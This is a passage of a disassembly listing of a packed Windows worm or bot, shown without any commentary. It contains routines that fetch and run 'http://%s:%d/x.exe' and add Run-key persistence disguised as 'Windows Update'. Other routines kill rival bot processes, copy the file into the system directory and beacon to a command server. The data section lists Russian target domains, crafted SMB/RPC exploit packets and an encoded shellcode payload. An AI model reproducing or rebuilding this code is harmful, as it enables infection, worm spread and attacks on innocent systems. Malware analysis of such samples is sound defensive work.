loc_30902682: ; CODE XREF: sub_309025F1+51�j
push 2710h
call ebx ; Sleep
loc_30902689: ; CODE XREF: sub_309025F1+67�j
; sub_309025F1+8F�j
movzx edi, word_3090503C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_30902356
test eax, eax
jz loc_30902617
pop edi
pop esi
pop ebx
loc_309026AA: ; CODE XREF: sub_309025F1+11�j
push 0
call dword_309010CC ; ExitThread
xor eax, eax
leave
retn 4
sub_309025F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309026B8 proc near ; CODE XREF: UPX0:30902786�p
; UPX0:loc_309027EC�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_30901FB1
push eax
call dword_30901158 ; inet_ntoa
mov esi, dword_30901068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpyA
push dword_3090502C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_30901118 ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_3090432A
call esi ; lstrcpyA
push offset byte_30904328
call dword_30901084 ; lstrlenA
mov byte_30904328[eax], 0DFh
pop esi
leave
retn
sub_309026B8 endp
; ---------------------------------------------------------------------------
loc_30902714: ; DATA XREF: sub_3090236A+154�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_30905034, ebx
call sub_30901FF0
mov esi, dword_30901094
mov edi, 1388h
test eax, eax
jnz short loc_30902742
loc_30902736: ; CODE XREF: UPX0:30902740�j
push edi
call esi ; Sleep
call sub_30901FF0
test eax, eax
jz short loc_30902736
loc_30902742: ; CODE XREF: UPX0:30902734�j
lea eax, [esp+14h]
push ebx
push eax
call dword_3090112C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_30905038, ebx
pop ebp
mov word_3090503C, 96h
jz short loc_3090277F
mov dword_30905038, 1
mov ebp, 15Eh
mov word_3090503C, 14h
loc_3090277F: ; CODE XREF: UPX0:30902765�j
call sub_30901FB1
mov ebx, eax
call sub_309026B8
cmp ebx, 100007Fh
jz short loc_309027A0
push ebx
push offset sub_30902505
call sub_30901F0A
pop ecx
pop ecx
loc_309027A0: ; CODE XREF: UPX0:30902791�j
mov dword ptr [esp+10h], 4
loc_309027A8: ; CODE XREF: UPX0:309027B9�j
push ebx
push offset sub_30902569
call sub_30901F0A
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_309027A8
test ebp, ebp
jle short loc_309027D0
loc_309027BF: ; CODE XREF: UPX0:309027CE�j
push 0
push offset sub_309025F1
call sub_30901F0A
pop ecx
dec ebp
pop ecx
jnz short loc_309027BF
loc_309027D0: ; CODE XREF: UPX0:309027BD�j
; UPX0:309027DC�j ...
call sub_30901FF0
test eax, eax
jz short loc_309027DE
push edi
call esi ; Sleep
jmp short loc_309027D0
; ---------------------------------------------------------------------------
loc_309027DE: ; CODE XREF: UPX0:309027D7�j
; UPX0:309027EA�j
call sub_30901FF0
test eax, eax
jnz short loc_309027EC
push edi
call esi ; Sleep
jmp short loc_309027DE
; ---------------------------------------------------------------------------
loc_309027EC: ; CODE XREF: UPX0:309027E5�j
call sub_309026B8
jmp short loc_309027D0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309027F3 proc near ; CODE XREF: sub_3090298C+8C�p
; sub_30902B06+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jnz short loc_30902826
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
loc_30902826: ; CODE XREF: sub_309027F3+1C�j
pop ebp
retn
sub_309027F3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902828 proc near ; CODE XREF: sub_3090217C+33�p
; sub_3090298C+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3090100C ; RegOpenKeyExA
test eax, eax
jz short loc_30902854
push 1
pop eax
jmp short loc_3090287E
; ---------------------------------------------------------------------------
loc_30902854: ; CODE XREF: sub_30902828+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_30901008 ; RegQueryValueExA
test eax, eax
jz short loc_30902873
push 2
pop esi
loc_30902873: ; CODE XREF: sub_30902828+46�j
push [ebp+arg_10]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_3090287E: ; CODE XREF: sub_30902828+2A�j
pop esi
leave
retn
sub_30902828 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902881 proc near ; CODE XREF: sub_30902A3A+96�p
; sub_30902B06+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_30901000 ; RegCreateKeyExA
test eax, eax
jz short loc_309028AA
push 1
pop eax
jmp short loc_309028D1
; ---------------------------------------------------------------------------
loc_309028AA: ; CODE XREF: sub_30902881+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_30901004 ; RegSetValueExA
test eax, eax
jz short loc_309028C6
push 2
pop esi
loc_309028C6: ; CODE XREF: sub_30902881+40�j
push [ebp+arg_4]
call dword_30901014 ; RegCloseKey
mov eax, esi
loc_309028D1: ; CODE XREF: sub_30902881+27�j
pop esi
pop ebp
retn
sub_30902881 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309028D4 proc near ; CODE XREF: sub_3090298C+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_30901084 ; lstrlenA
mov esi, eax
dec esi
test esi, esi
jle loc_30902988
loc_309028F4: ; CODE XREF: sub_309028D4+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_309028FD
dec esi
jns short loc_309028F4
loc_309028FD: ; CODE XREF: sub_309028D4+24�j
push 0
push 2
call sub_30902CCC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_30902988
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_30902C76 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_30902CC6 ; Process32First
test eax, eax
jz short loc_30902988
lea esi, [esi+ebx+1]
loc_30902945: ; CODE XREF: sub_309028D4+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_30901100 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_30902975
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_309010AC ; OpenProcess
push 0
push eax
call dword_30901060 ; TerminateProcess
loc_30902975: ; CODE XREF: sub_309028D4+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_30902CC0 ; Process32Next
test eax, eax
jnz short loc_30902945
loc_30902988: ; CODE XREF: sub_309028D4+1A�j
; sub_309028D4+38�j ...
pop esi
pop ebx
leave
retn
sub_309028D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090298C proc near ; CODE XREF: UPX0:30902333�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_309029F5: ; CODE XREF: sub_3090298C+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_30902828
add esp, 14h
test eax, eax
jnz short loc_30902A2C
push ebx
push edi
push esi
call sub_309027F3
lea eax, [ebp+var_138]
push eax
call sub_309028D4
add esp, 10h
loc_30902A2C: ; CODE XREF: sub_3090298C+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_309029F5
pop edi
pop esi
pop ebx
leave
retn
sub_3090298C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902A3A proc near ; CODE XREF: sub_30902B06+D1�p
; sub_30902B06+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_30902A4F
push [ebp+arg_0]
call dword_30901074 ; DeleteFileA
loc_30902A4F: ; CODE XREF: sub_30902A3A+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3090108C ; GetSystemDirectoryA
test eax, eax
jz locret_30902B04
push esi
call dword_309010F8 ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_30901F2B
mov esi, dword_30901088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push offset asc_30904268 ; "\\"
push eax
call esi ; lstrcatA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcatA
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_30901050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_30901084 ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_30902881
add esp, 14h
push dword_30905024
call dword_3090107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_30901054 ; WinExec
push 1F4h
call dword_30901094 ; Sleep
push 0
call dword_309010DC ; ExitProcess
pop esi
locret_30902B04: ; CODE XREF: sub_30902A3A+23�j
leave
retn
sub_30902A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902B06 proc near ; CODE XREF: UPX0:30902338�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_30901048 ; GetModuleFileNameA
test eax, eax
jz loc_30902C3F
and dword_30905040, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_30902828
add esp, 14h
test eax, eax
jz short loc_30902B8C
call dword_309010F8 ; rand
push 0Ah
mov ebx, offset aElvrryfvsrhtjx ; "elvrryfvsrhtjxye"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_30901F2B
pop ecx
pop ecx
push ebx
call dword_30901084 ; lstrlenA
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_30902881
add esp, 14h
jmp short loc_30902B9B
; ---------------------------------------------------------------------------
loc_30902B8C: ; CODE XREF: sub_30902B06+4D�j
lea eax, [ebp+var_20]
push eax
push offset aElvrryfvsrhtjx ; "elvrryfvsrhtjxye"
call dword_30901068 ; lstrcpyA
loc_30902B9B: ; CODE XREF: sub_30902B06+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_30902828
add esp, 14h
test eax, eax
jz short loc_30902BE1
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_30902881
lea eax, [ebp+var_84]
push eax
push 0
call sub_30902A3A
add esp, 1Ch
jmp short loc_30902C3F
; ---------------------------------------------------------------------------
loc_30902BE1: ; CODE XREF: sub_30902B06+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3090104C ; lstrcmpiA
test eax, eax
jnz short loc_30902C2A
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_30902828
add esp, 14h
test eax, eax
jnz short loc_30902C3F
push ebx
push edi
push esi
mov dword_30905040, 1
call sub_309027F3
add esp, 0Ch
jmp short loc_30902C3F
; ---------------------------------------------------------------------------
loc_30902C2A: ; CODE XREF: sub_30902B06+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_30902A3A
pop ecx
pop ecx
loc_30902C3F: ; CODE XREF: sub_30902B06+1F�j
; sub_30902B06+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_30902B06 endp
; =============== S U B R O U T I N E =======================================
sub_30902C44 proc near ; CODE XREF: sub_309011A0+CA�p
; sub_309015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_30901044 ; VirtualAlloc
retn
sub_30902C44 endp
; =============== S U B R O U T I N E =======================================
sub_30902C58 proc near ; CODE XREF: sub_309011A0+10B�p
; sub_309015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_30901040 ; VirtualFree
retn
sub_30902C58 endp
; ---------------------------------------------------------------------------
align 10h
loc_30902C70: ; DATA XREF: sub_30901422+A�o
; sub_3090236A+A�o
jmp dword ptr loc_309010FC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C76 proc near ; CODE XREF: sub_309017B9+128�p
; sub_309017B9+134�p ...
jmp dword_309010F4
sub_30902C76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C7C proc near ; CODE XREF: sub_309017B9+9C�p
; sub_309017B9+C5�p ...
jmp dword_309010F0
sub_30902C7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902C82 proc near ; CODE XREF: sub_309017B9+93�p
; sub_309017B9+B2�p ...
jmp dword_309010EC
sub_30902C82 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_30902C90 proc near ; CODE XREF: sub_309017B9+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_30902CB0
loc_30902C9C: ; CODE XREF: sub_30902C90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_30902C9C
loc_30902CB0: ; CODE XREF: sub_30902C90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_30902C90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CC0 proc near ; CODE XREF: sub_309028D4+AB�p
jmp dword_30901064
sub_30902CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CC6 proc near ; CODE XREF: sub_309028D4+64�p
jmp dword_3090105C
sub_30902CC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_30902CCC proc near ; CODE XREF: sub_309028D4+2D�p
jmp dword_30901058
sub_30902CCC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4CBh dup(0)
dword_30904000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_30901422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309015C7+84�o
align 10h
byte_30904080 db 1 ; DATA XREF: sub_3090169C+5�r
off_30904081 dd offset aMazafaka_ru ; DATA XREF: sub_3090169C+D�r
; "mazafaka.ru"
db 1, 44h, 42h
db 90h
db 30h, 1, 34h
dd 1309042h, 30904224h, 90421000h, 42000130h, 0F0013090h
dd 309041h, 309041E4h, 9041D801h, 41C80130h, 0B8003090h
dd 1309041h, 309041ACh, 9041A001h, 41880030h, 70003090h
dd 309041h, 3090415Ch, 90415401h, 41440130h, 34013090h
dd 309041h, 30904128h, 90411801h, 41100130h, 4013090h
dd 1309041h, 309040F8h, 68746566h, 2E647261h, 7A6962h
dd 6B636168h, 2E737265h, 766Ch, 2E767663h, 7572h, 2E777777h
dd 6C646572h, 2E656E69h, 7572h, 6B76616Bh, 742E7A61h, 76h
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6B76616Bh, 65637A61h
dd 7265746Eh, 6D6F632Eh, 0
aWww_chechenpre db 'www.chechenpress.info',0
align 4
aWww_chechenp_0 db 'www.chechenpress.com',0
align 10h
aTrojan_ru db 'trojan.ru',0
align 4
aAsechka_ru db 'asechka.ru',0
align 4
aMasterX_com db 'master-x.com',0
align 4
aColorBank_ru db 'color-bank.ru',0
align 4
aKavkaz_ru db 'kavkaz.ru',0
align 4
aCrutop_nu db 'crutop.nu',0
align 10h
aKidosBank_ru db 'kidos-bank.ru',0
align 10h
aParexBank_ru db 'parex-bank.ru',0
align 10h
aAdultEmpire_co db 'adult-empire.com',0
align 4
aKonfiskat_org db 'konfiskat.org',0
align 4
aCitiBank_ru db 'citi-bank.ru',0
align 4
aXware_cjb_net db 'xware.cjb.net',0
align 4
aMazafaka_ru db 'mazafaka.ru',0 ; DATA XREF: UPX0:off_30904081�o
a_exe db '.exe',0 ; DATA XREF: sub_309011A0+75�o
; sub_30902036+55�o ...
align 4
asc_30904268: ; DATA XREF: sub_309011A0+49�o
; sub_30902A3A+56�o
unicode 0, <\>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_309011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_30901316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_30901316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_30901422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_309015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=16&cnt=%s',0
; DATA XREF: sub_309015C7+57�o
align 8
byte_30904328 db 0EBh ; DATA XREF: sub_309017B9+24E�o
; sub_309017B9+260�o ...
db 58h
word_3090432A dw 7468h ; DATA XREF: sub_309026B8+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999AFh, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_309045F0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_309017B9+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3090467C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_30904728 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_30904808 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_309017B9+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_3090486C dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_309048D8 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3090497C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_309049FC dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_30904A90 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_30904AFC dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_309017B9+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_30904B70 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_30904C2E dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_30904C68 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_309017B9+41B�o
; sub_309017B9+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_30904CE0: ; DATA XREF: sub_309017B9+44A�o
jmp short loc_30904CE8
; ---------------------------------------------------------------------------
jmp short loc_30904CEA
; ---------------------------------------------------------------------------
align 8
loc_30904CE8: ; CODE XREF: UPX0:loc_30904CE0�j
; DATA XREF: sub_309017B9+5C�o
pop esp
pop esp
